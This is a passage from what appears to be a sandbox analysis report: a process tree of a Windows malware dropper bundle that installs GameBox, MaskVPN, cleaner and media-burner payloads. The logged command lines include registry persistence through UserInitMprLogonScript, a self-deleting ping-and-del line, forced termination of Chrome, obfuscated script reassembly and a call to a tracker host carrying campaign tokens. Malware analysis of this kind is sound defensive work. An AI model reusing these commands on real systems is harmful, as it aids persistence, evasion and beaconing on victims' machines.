                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4804
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1032
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1032
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1408
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:4536
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1444
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:96
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1396
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:4888
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1616
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:5336
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 1688
                                                                                  3⤵
                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                  • Program crash
                                                                                  PID:3628
                                                                              • C:\Users\Admin\Documents\moHecLmO9wJfvwTzA8sgP8sV.exe
                                                                                "C:\Users\Admin\Documents\moHecLmO9wJfvwTzA8sgP8sV.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2844
                                                                              • C:\Users\Admin\Documents\OMXqeLy1NeyGjCoeRlqAyYlQ.exe
                                                                                "C:\Users\Admin\Documents\OMXqeLy1NeyGjCoeRlqAyYlQ.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:2840
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 660
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:3600
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 700
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4840
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 676
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Program crash
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2804
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 692
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4568
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1172
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:3052
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1120
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2592
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1116
                                                                                  3⤵
                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                  • Program crash
                                                                                  PID:5012
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 1152
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5056
                                                                              • C:\Users\Admin\Documents\WPpBqCj82nN62bVMEB74J1wK.exe
                                                                                "C:\Users\Admin\Documents\WPpBqCj82nN62bVMEB74J1wK.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks BIOS information in registry
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3112
                                                                              • C:\Users\Admin\Documents\dG5i6idr4P19DEbpNSqi3ci2.exe
                                                                                "C:\Users\Admin\Documents\dG5i6idr4P19DEbpNSqi3ci2.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2808
                                                                                • C:\Users\Admin\Documents\dG5i6idr4P19DEbpNSqi3ci2.exe
                                                                                  C:\Users\Admin\Documents\dG5i6idr4P19DEbpNSqi3ci2.exe
                                                                                  3⤵
                                                                                    PID:4204
                                                                                  • C:\Users\Admin\Documents\dG5i6idr4P19DEbpNSqi3ci2.exe
                                                                                    C:\Users\Admin\Documents\dG5i6idr4P19DEbpNSqi3ci2.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4960
                                                                                • C:\Users\Admin\Documents\L9ZMJKsFpNGaBbQG0S7v7w4C.exe
                                                                                  "C:\Users\Admin\Documents\L9ZMJKsFpNGaBbQG0S7v7w4C.exe"
                                                                                  2⤵
                                                                                    PID:2804
                                                                                    • C:\Users\Admin\Documents\L9ZMJKsFpNGaBbQG0S7v7w4C.exe
                                                                                      "C:\Users\Admin\Documents\L9ZMJKsFpNGaBbQG0S7v7w4C.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4948
                                                                                  • C:\Users\Admin\Documents\N6NcIUNckhY7KM7PUXkc31BH.exe
                                                                                    "C:\Users\Admin\Documents\N6NcIUNckhY7KM7PUXkc31BH.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2976
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2PPN8.tmp\N6NcIUNckhY7KM7PUXkc31BH.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2PPN8.tmp\N6NcIUNckhY7KM7PUXkc31BH.tmp" /SL5="$501C8,138429,56832,C:\Users\Admin\Documents\N6NcIUNckhY7KM7PUXkc31BH.exe"
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:2768
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-2067F.tmp\Setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-2067F.tmp\Setup.exe" /Verysilent
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5288
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5600
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 760
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:5952
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 800
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:5768
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 776
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:6792
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 828
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:6740
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 960
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:5896
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1088
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:6248
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1148
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:5276
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1012
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:6648
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1464
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:1088
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1500
                                                                                        4⤵
                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                        • Program crash
                                                                                        PID:5564
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5632
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-EHPNH.tmp\Inlog.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-EHPNH.tmp\Inlog.tmp" /SL5="$402DA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                        4⤵
                                                                                          PID:5800
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NLLA5.tmp\Setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NLLA5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                            5⤵
                                                                                              PID:6180
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3GRV0.tmp\Setup.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3GRV0.tmp\Setup.tmp" /SL5="$202AA,17367080,721408,C:\Users\Admin\AppData\Local\Temp\is-NLLA5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                6⤵
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:6356
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-O3P1M.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                  7⤵
                                                                                                    PID:6496
                                                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-O3P1M.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                      8⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      PID:6956
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                    7⤵
                                                                                                      PID:8032
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                        8⤵
                                                                                                          PID:4452
                                                                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                        7⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:7992
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-O3P1M.tmp\{app}\vdi_compiler.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-O3P1M.tmp\{app}\vdi_compiler"
                                                                                                        7⤵
                                                                                                          PID:5820
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-O3P1M.tmp\{app}\vdi_compiler.exe"
                                                                                                            8⤵
                                                                                                              PID:6456
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping localhost -n 4
                                                                                                                9⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:2496
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                            7⤵
                                                                                                            • Checks computer location settings
                                                                                                            PID:4432
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Enumerates connected drives
                                                                                                    • Modifies system certificate store
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:5652
                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629305979 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                      4⤵
                                                                                                        PID:6308
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5680
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-QH2AI.tmp\WEATHER Manager.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-QH2AI.tmp\WEATHER Manager.tmp" /SL5="$202E2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:5916
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-S6QJD.tmp\Setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-S6QJD.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Enumerates connected drives
                                                                                                          • Modifies system certificate store
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:5864
                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-S6QJD.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-S6QJD.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629305979 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                            6⤵
                                                                                                              PID:7960
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5716
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-JQIOU.tmp\VPN.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-JQIOU.tmp\VPN.tmp" /SL5="$30310,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:5972
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-VNRKD.tmp\Setup.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-VNRKD.tmp\Setup.exe" /silent /subid=720
                                                                                                            5⤵
                                                                                                              PID:6372
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-V4GS1.tmp\Setup.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-V4GS1.tmp\Setup.tmp" /SL5="$203E4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-VNRKD.tmp\Setup.exe" /silent /subid=720
                                                                                                                6⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Modifies registry class
                                                                                                                • Modifies system certificate store
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:6472
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                  7⤵
                                                                                                                    PID:7632
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      8⤵
                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                      PID:6804
                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                      tapinstall.exe remove tap0901
                                                                                                                      8⤵
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      PID:5708
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                    7⤵
                                                                                                                      PID:4560
                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                        8⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Modifies system certificate store
                                                                                                                        PID:7756
                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                      7⤵
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:8076
                                                                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                      7⤵
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:7092
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:5744
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5776
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                4⤵
                                                                                                                  PID:4560
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                    5⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:4496
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5836
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-0RGKC.tmp\MediaBurner2.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-0RGKC.tmp\MediaBurner2.tmp" /SL5="$3035E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:6112
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-K0A1J.tmp\3377047_logo_media.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-K0A1J.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                    5⤵
                                                                                                                    • Drops file in Drivers directory
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Adds Run key to start application
                                                                                                                    PID:4212
                                                                                                                    • C:\Program Files\Microsoft Office\LUMIAKAFBK\ultramediaburner.exe
                                                                                                                      "C:\Program Files\Microsoft Office\LUMIAKAFBK\ultramediaburner.exe" /VERYSILENT
                                                                                                                      6⤵
                                                                                                                        PID:6048
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2B92J.tmp\ultramediaburner.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2B92J.tmp\ultramediaburner.tmp" /SL5="$5022C,281924,62464,C:\Program Files\Microsoft Office\LUMIAKAFBK\ultramediaburner.exe" /VERYSILENT
                                                                                                                          7⤵
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:6296
                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                            8⤵
                                                                                                                              PID:1328
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6b-6c18d-bd6-9918e-b7eb3a5a7b846\Tylyjishijae.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\6b-6c18d-bd6-9918e-b7eb3a5a7b846\Tylyjishijae.exe"
                                                                                                                          6⤵
                                                                                                                            PID:2168
                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                              dw20.exe -x -s 2428
                                                                                                                              7⤵
                                                                                                                                PID:7200
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\18-53a2c-ed7-ffda0-9f3fe9c6176d3\Jokalaesaequ.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\18-53a2c-ed7-ffda0-9f3fe9c6176d3\Jokalaesaequ.exe"
                                                                                                                              6⤵
                                                                                                                                PID:2564
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kzq4eahg.n1e\GcleanerEU.exe /eufive & exit
                                                                                                                                  7⤵
                                                                                                                                    PID:7736
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kzq4eahg.n1e\GcleanerEU.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\kzq4eahg.n1e\GcleanerEU.exe /eufive
                                                                                                                                      8⤵
                                                                                                                                        PID:8136
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0wux2h2.qno\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                      7⤵
                                                                                                                                        PID:6208
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f0wux2h2.qno\installer.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\f0wux2h2.qno\installer.exe /qn CAMPAIGN="654"
                                                                                                                                          8⤵
                                                                                                                                            PID:4360
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxays2oq.pef\ufgaa.exe & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:5772
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3bkwf2z.zdz\anyname.exe & exit
                                                                                                                                            7⤵
                                                                                                                                              PID:7700
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                8⤵
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:7720
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\m3bkwf2z.zdz\anyname.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\m3bkwf2z.zdz\anyname.exe
                                                                                                                                                8⤵
                                                                                                                                                  PID:7172
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\m3bkwf2z.zdz\anyname.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\m3bkwf2z.zdz\anyname.exe" -q
                                                                                                                                                    9⤵
                                                                                                                                                      PID:8076
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eujk3sl1.a11\gcleaner.exe /mixfive & exit
                                                                                                                                                  7⤵
                                                                                                                                                    PID:1736
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\eujk3sl1.a11\gcleaner.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\eujk3sl1.a11\gcleaner.exe /mixfive
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7472
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afzzsetc.tfw\autosubplayer.exe /S & exit
                                                                                                                                                      7⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:2116
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5980
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp48C8_tmp.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\tmp48C8_tmp.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3692
                                                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5524
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                    5⤵
                                                                                                                                                      PID:6824
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6724
                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                            findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6480
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                              Esplorarne.exe.com i
                                                                                                                                                              7⤵
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                              PID:6300
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:7720
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:8052
